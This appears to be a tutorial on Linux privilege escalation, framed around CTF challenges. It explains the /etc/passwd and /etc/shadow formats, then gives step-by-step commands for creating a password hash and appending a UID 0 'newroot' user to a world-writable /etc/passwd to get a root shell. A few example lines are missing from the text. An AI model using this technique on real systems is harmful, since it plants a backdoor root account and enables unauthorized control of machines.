Escalation Privilege on Linux/Unix System by Editing /etc/passwd and /etc/shadow files :

etc/passwd file :

The /etc/passwd file stores essential information, which is required during login i.e. user account information. It is basically a text file that contains the information about each user or account on a computer running Linux or another Unix-like operating system. The permissions for /etc/passwd are by default set so that it is world readable, that is, so that it can be read by any user on the system. Example :
 $ cat /etc/passwd
 pulse:x:116:122:PulseAudio daemon,,,:/var/run/pulse:/usr/sbin/nologin
 nm-openvpn:x:117:124:NetworkManager OpenVPN,,,:/var/lib/openvpn/chroot:/usr/sbin/nologin
 avahi:x:118:125:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/usr/sbin/nologin
The file contains information about all user who are in the system. The structure of fields are as follows :
 UserName | Password | UserID | GroupID | UserInformation | HomeDirectory | Shell
  • UserName is the user's login name, that is the name that a user types in when logging into the system.
  • The Password field originally contained an encrypted login password. However, for security reasons, the encrypted passwords are now contained on another file, /etc/shadow, that cannot be read by ordinary users. This field now merely contains the letter x to indicate that a password has been assigned to the user and is required for authentication. If this field is empty, the user can log in without a password.
  • UserID is the user's unique numeric identification number, which is used by the system for access control. Zero is reserved for the root account
  • GroupID specifies the user's principal group identification number. This is usually the same as the user ID.
  • UserInformation is basically comment field. It allows to add extra information about the users such as user's full name, phone number etc.
  • HomeDirectory is the full path of the user's home directory.
  • Shell is the full path of the default shell for the user.

etc/shadow file :

The actual password data is stored in a file called "/etc/shadow". This doesn't actually contain passwords in plain text, rather it contains hashed password. However this file can be only read/edit bu root users.

Now in some cases the /etc/passwd file is writable to normal users also (Specially in some CTF challenges), so in that case a normal user can gain root access by manually editing these files.

Note: This method only works if /etc/passwd is permitted to read-write for all users. For example :
 $ ls -al /etc/passwd
 -rw-rw-rw- 1 root root 2364 Nov 16  2017 /etc/passwd
In this case by appending a new user who has root privilege assigned, into the /etc/passwd file with password we are able to get root shell.

Preparing new user to append on file : 

The root user entry is look like this
Now we have to place our encrypted password in place of x.

Creating Password :

There are lots of method to create hashed password for example :

With Python :
 $ python -c 'import crypt; print crypt.crypt("password", "$6$salt")'
where "password" is password and "$6$salt" is salt value.

With mkpasswd :
 $ mkpasswd -m SHA-512 password

With OpenSSL:
 $ openssl passwd -1 -salt hack password123
Where :
  • -1 : md5 based password algorithm (other options are -5 for SHA256 and -6 for SHA512 ),
  • -salt : salt key, which is "hack" and password is password123
Now we have to append below line into /etc/passwd file :
Now append above line onto the /etc/passwd file
 $ echo "newroot:\$1\$hack\$MLgkAESrYp7kzYz0Ex2fV/:0:0:root:/root:/bin/bash" >> /etc/passwd
Note : don't forget to put \ sign before all the $ sign on the password field, else echo command will try to interpret it as a variable.

Now try to login with our newly created user.
 $ su - newroot
 $ whoami
and thats it!, we got a root shell.